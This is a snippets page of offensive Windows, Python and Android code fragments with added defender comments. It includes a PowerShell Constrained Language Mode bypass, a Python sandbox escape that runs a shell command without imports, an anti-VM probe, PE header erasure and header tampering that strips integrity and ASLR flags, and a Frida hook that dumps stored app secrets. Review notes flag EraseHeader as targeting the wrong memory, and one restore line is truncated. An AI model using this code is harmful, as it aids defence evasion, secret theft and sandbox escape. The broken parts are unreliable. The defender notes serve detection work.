snippets
short code fragments: recipes, tricks, one-shot scripts — the kind of thing that doesn't deserve a full post but that you don't want to lose either.

Bypass CLM
# Save this session's TEMP/TMP so they can be put back at the end.
$CurrTemp = $env:temp
$CurrTmp = $env:tmp
# Both variables are pointed at the same fixed system directory.
$TEMPBypassPath = "C:\windows\temp"
$TMPBypassPath = "C:\windows\temp"
# Rewrite the per-user environment in the registry (HKCU\Environment is normally writable
# without elevation). Note the variable names are crossed (Tmp gets $TEMPBypassPath and
# Temp gets $TMPBypassPath) - harmless here because both hold the same path.
# How the changed TEMP/TMP affects the language mode of the new shell is not shown on this page.
# Defender note: a write to HKCU\Environment\Tmp or \Temp immediately followed by a
# Win32_Process.Create of powershell.exe, and then the values being reverted a few seconds
# later, is the observable sequence of this snippet.
Set-ItemProperty -Path 'hkcu:\Environment' -Name Tmp -Value "$TEMPBypassPath"
Set-ItemProperty -Path 'hkcu:\Environment' -Name Temp -Value "$TMPBypassPath"
# Start a fresh PowerShell through WMI rather than as a child of this shell, so it picks up
# the registry environment instead of inheriting this process's (presumably - confirm).
Invoke-WmiMethod -Class win32_process -Name create -ArgumentList "Powershell.exe"
# Give the new process time to start before the values are reverted.
sleep 5
#Set it back
Set-ItemProperty -Path 'hkcu:\Environment' -Name Tmp -Value $CurrTmp
# NOTE: the line below is truncated in the source page; the symmetric restore would use $CurrTemp.
Set-ItemProperty -Path 'hkcu:\Environment' -Name Temp -Value $Cur...
Calling os.system Without import Statements
#!/usr/bin/env python3
# Note: this is clearly bad practice and should not be used in real projects.
# It is not confirmed that this will work in the future
def iter_system_functions():
    """Yield every ``system``-like callable reachable from ``object`` without an ``import``.

    Walks ``object.__subclasses__()`` for the ``os._wrap_close`` class (the wrapper
    ``os.popen`` uses); that class's ``__init__`` carries the ``os`` module globals,
    from which anything whose repr contains ``"function system"`` is yielded.

    Defender note: this is why an "import"-only deny list is not a sandbox - attribute
    access to ``__subclasses__``/``__globals__`` must be blocked too, or the code run in
    a real isolation boundary (separate process, seccomp, container).
    """
    for candidate_cls in object.__subclasses__():
        if "_wrap_close" not in str(candidate_cls):
            continue
        for value in candidate_cls.__init__.__globals__.values():
            if "function system" in str(value):
                yield value


# Same effect as the original loop: every match is invoked with "id".
for run_shell in iter_system_functions():
    run_shell("id")
Check for Synthetic MSR
// Reserved MSR address space: no physical processor implements MSRs in this range,
// which is why a read that succeeds is taken below as a sign that a hypervisor is answering.
//
// Goes up to 0x400000FF
//
#define SYNTHETIC_MSR_RANGE_START 0x40000000

// Probe the first MSR of the range reserved for hypervisors.
//
// RDMSR is a privileged instruction, so this is kernel-mode code. On bare metal an
// unimplemented MSR raises a general-protection fault, which the SEH handler turns into
// FALSE. If the read completes, something implemented the MSR - most likely a hypervisor -
// and TRUE is returned.
//
// Defender note: a driver issuing RDMSR 0x40000000 inside a __try block is a classic
// anti-VM / anti-sandbox fingerprint; analysis environments can answer it like real
// hardware (fault) to neutralise the check.
BOOLEAN CheckForSyntheticMSR() {
    __try {
        (void)__readmsr(SYNTHETIC_MSR_RANGE_START);
        return TRUE;
    }
    __except (EXCEPTION_EXECUTE_HANDLER) {
        return FALSE;
    }
}
Erase PE Header in Memory
// Size of the region EraseHeader makes writable and zeroes (one 4 KiB page).
#define PAGE_SIZE 0x1000
// Pseudo-handle for the calling process (the same -1 value GetCurrentProcess returns).
#define NtCurrentProcess() ((HANDLE)(LONG_PTR)-1)
// NTSTATUS values. Of these only STATUS_PROCEDURE_NOT_FOUND is referenced by EraseHeader
// below; STATUS_ACCESS_VIOLATION, which EraseHeader also returns, is not defined here and
// presumably comes from ntstatus.h.
#define STATUS_PROCEDURE_NOT_FOUND 0xC000007A
#define STATUS_INVALID_PAGE_PROTECTION 0xC0000045
#define STATUS_SECTION_PROTECTION 0xC000004E
#define STATUS_SUCCESS 0x00000000
// Prototype of ntdll!NtProtectVirtualMemory, resolved at run time by EraseHeader through
// GetProcAddress. BaseAddress and RegionSize are _Inout_: the call writes the (page-rounded)
// region back through both pointers, so callers must not pass pointers to data they cannot
// afford to have overwritten.
typedef
NTSYSCALLAPI
NTSTATUS
(NTAPI* pNtProtectVirtualMemory) (
_In_ HANDLE ProcessHandle,
_Inout_ PVOID* BaseAddress,
_Inout_ PSIZE_T RegionSize,
_In_ ULONG NewProtect,
_Out_ PULONG OldProtect
);
// Make the first page of the current module writable through a dynamically resolved
// NtProtectVirtualMemory, zero it, and restore the previous protection. Returns an
// NTSTATUS: STATUS_PROCEDURE_NOT_FOUND if the export cannot be resolved, the failing
// status of the first protection change, STATUS_ACCESS_VIOLATION if zeroing faulted,
// otherwise the status of the final protection restore.
//
// Defender note: a module remains identifiable without its in-memory header - the
// backing section object / file on disk and the PEB loader list still describe it - and
// a mapped image whose first page is all zeros is itself an anomaly worth alerting on.
NTSTATUS EraseHeader() {
// Retrieve our module's base address
// NOTE(review): `base` is a pointer to the LDR_DATA_TABLE_ENTRY of the first module in
// load order (normally the EXE), i.e. a loader bookkeeping record on the heap - not the
// address at which the image is mapped (that would be the entry's DllBase field).
auto base = CONTAINING_RECORD(
NtCurrentPeb()->Ldr->InLoadOrderModuleList.Flink,
LDR_DATA_TABLE_ENTRY,
InLoadOrderLinks
);
// Retrieve ntdll's base address
// NOTE(review): likewise ntdll's LDR entry (second in load order), not its DllBase.
auto ntdll = CONTAINING_RECORD(
NtCurrentPeb()->Ldr->InLoadOrderModuleList.Flink->Flink,
LDR_DATA_TABLE_ENTRY,
InLoadOrderLinks
);
// Check if NtProtectVirtualMemory actually exists
// NOTE(review): GetProcAddress expects a module base (HMODULE); here it receives the LDR
// entry pointer cast to HMODULE - confirm this lookup succeeds at all.
if (!GetProcAddress(reinterpret_cast<HMODULE>(ntdll), "NtProtectVirtualMemory")) {
SetLastError(ERROR_PROC_NOT_FOUND);
return STATUS_PROCEDURE_NOT_FOUND;
}
// Retrieve its address
// Function-local static: the export is resolved once per process and reused on later calls.
static auto _vprotect = reinterpret_cast<
pNtProtectVirtualMemory > (
GetProcAddress(reinterpret_cast<HMODULE>(ntdll), "NtProtectVirtualMemory")
);
// Change the protection of the 1st page of our PE (likely our PE header in memory)
// to PAGE_READWRITE, so we can zero it out.
ULONG oldProtect = 0;
SIZE_T size = PAGE_SIZE;
// NOTE(review): reinterpret_cast<PVOID*>(base) makes the call read *base - the first
// field of the LDR entry (InLoadOrderLinks.Flink) - as the region address, and because
// BaseAddress is _Inout_ the page-rounded address is written back into that field.
// This does not match the comment above ("1st page of our PE"); confirm the intended
// target before relying on this code.
auto status = _vprotect(
NtCurrentProcess(),
reinterpret_cast<PVOID*>(base),
&size,
PAGE_READWRITE,
&oldProtect
);
if(!NT_SUCCESS(status)) {
return status;
}
// Zero out the whole page
// NOTE(review): zeroes PAGE_SIZE bytes starting at the LDR entry itself (see above).
__try {
RtlSecureZeroMemory(
base,
PAGE_SIZE
);
}
// If somehow RtlSecureZeroMemory fails, restore protections
// The saved oldProtect is reapplied; the previous protection reported by this restore is discarded.
__except (EXCEPTION_EXECUTE_HANDLER) {
ULONG dummy;
_vprotect(
NtCurrentProcess(),
reinterpret_cast<PVOID*>(base),
&size,
oldProtect,
&dummy
);
// Not defined in this file; presumably comes from ntstatus.h.
return STATUS_ACCESS_VIOLATION;
}
// Restore protections anyway
// oldProtect is passed by value as the new protection and is then overwritten with the
// protection that was in place before this call (PAGE_READWRITE).
status = _vprotect(
NtCurrentProcess(),
reinterpret_cast<PVOID*>(base),
&size,
oldProtect,
&oldProtect
);
return status;
}
Frida hook: dump FlutterSecureStorage reads
// Frida hook that logs every FlutterSecureStorage read/write to the console.
//
// Defender note: this shows that values kept in FlutterSecureStorage are recoverable at run
// time on an instrumented device. On-device storage is a convenience, not a trust boundary;
// root/hook detection raises the cost but does not prevent this, so secrets that matter
// should not live only on the client.
Java.perform(function hookFlutterSecureStorage() {
    const CLASS_NAME = "com.it_nomads.fluttersecurestorage.FlutterSecureStorage";
    const RETRY_MS = 5000; // you can change the time here if you prefer
    let storage = null;
    try {
        storage = Java.use(CLASS_NAME);
        if (storage) {
            console.log("> FlutterSecureStorage found");
            // read(String): call through, then log key and returned value.
            storage.read.overload('java.lang.String').implementation = function (key) {
                const data = this.read(key);
                console.log("Reading Data | Key: " + key + " | Data: " + data);
                return data;
            };
            // write(String, String): log key and value, then call through.
            storage.write.overload('java.lang.String', 'java.lang.String').implementation = function (key, value) {
                console.log("Writing Data | Key: " + key + " | Data: " + value);
                return this.write(key, value);
            };
        }
    } catch (err) {
        // Class not loaded yet: schedule another attempt. The named function replaces
        // arguments.callee from the original, which is unavailable in strict mode.
        // NOTE(review): the retry re-enters this callback from a timer, i.e. outside the
        // Java.perform that first invoked it - confirm your Frida version allows Java.use
        // there, otherwise wrap the retry in Java.perform again.
        console.log("[!] FlutterSecureStorage not found yet. Retrying...");
        setTimeout(hookFlutterSecureStorage, RETRY_MS);
    }
});
Increase PE's SizeOfImage field
// Add a large constant to the SizeOfImage recorded in a loader-list entry of the given PEB.
//
// Defender note: only the loader's bookkeeping changes, not the mapping itself; tools that
// walk the PEB module list get a size that disagrees with the on-disk header and with what
// VirtualQuery reports for the region - that disagreement is the detection signal.
void IncreaseSizeOfImage(PPEB peb) {
    // Arbitrary increment (same value as the original).
    constexpr ULONG kSizeOfImageDelta = 0x10000000;
    // Head of the loader's in-load-order module list.
    const LIST_ENTRY& moduleList = peb->LoaderData->InLoadOrderModuleList;
    // Second entry in load order: head -> first entry (moduleList.Flink) -> this one.
    // NOTE(review): the original comment called this "our PE", but the first entry is
    // moduleList.Flink itself; EraseHeader on this page treats that first entry as the
    // current module. Confirm which module is meant before relying on this.
    const auto entry = reinterpret_cast<peb::PLDR_DATA_TABLE_ENTRY>(moduleList.Flink->Flink);
    // Unsigned 32-bit addition wraps modulo 2^32, exactly as the original's double cast did.
    entry->SizeOfImage += kSizeOfImageDelta;
}
Tamper DllCharacteristics
// Clear FORCE_INTEGRITY (mandatory signature check) and DYNAMIC_BASE (ASLR opt-in) in the
// in-memory optional header of the module mapped at moduleBase.
//
// Returns true if at least one of the two flags was set (and has now been cleared),
// false if neither was set and the header was left untouched.
//
// Defender note: this edits the already-mapped copy after the loader has acted on the
// original flags; the file on disk is unchanged. Comparing a module's in-memory header
// with its on-disk header exposes the tampering.
bool TamperDllCharacteristics(DWORD_PTR moduleBase) {
    constexpr WORD kClearedFlags =
        IMAGE_DLLCHARACTERISTICS_FORCE_INTEGRITY | IMAGE_DLLCHARACTERISTICS_DYNAMIC_BASE;
    // Locate the NT headers through the DOS stub's e_lfanew offset.
    const auto dos = reinterpret_cast<PIMAGE_DOS_HEADER>(moduleBase);
    const auto nt = reinterpret_cast<PIMAGE_NT_HEADERS>(moduleBase + dos->e_lfanew);
    auto& characteristics = nt->OptionalHeader.DllCharacteristics;
    if ((characteristics & kClearedFlags) == 0) {
        return false;
    }
    characteristics &= ~kClearedFlags;
    return true;
}
Rename Process Name by Modifying cmdline in Linux
#!/usr/bin/env python3
import ctypes
from threading import get_ident
libc = ctypes.CDLL("libc.so.6")
libc.pthread_setname_np(
ctypes.c_ulong(get_ident()),
ctypes.c_char_p(b"process_name"))
© 2026 inferi
· cc by-sa 4.0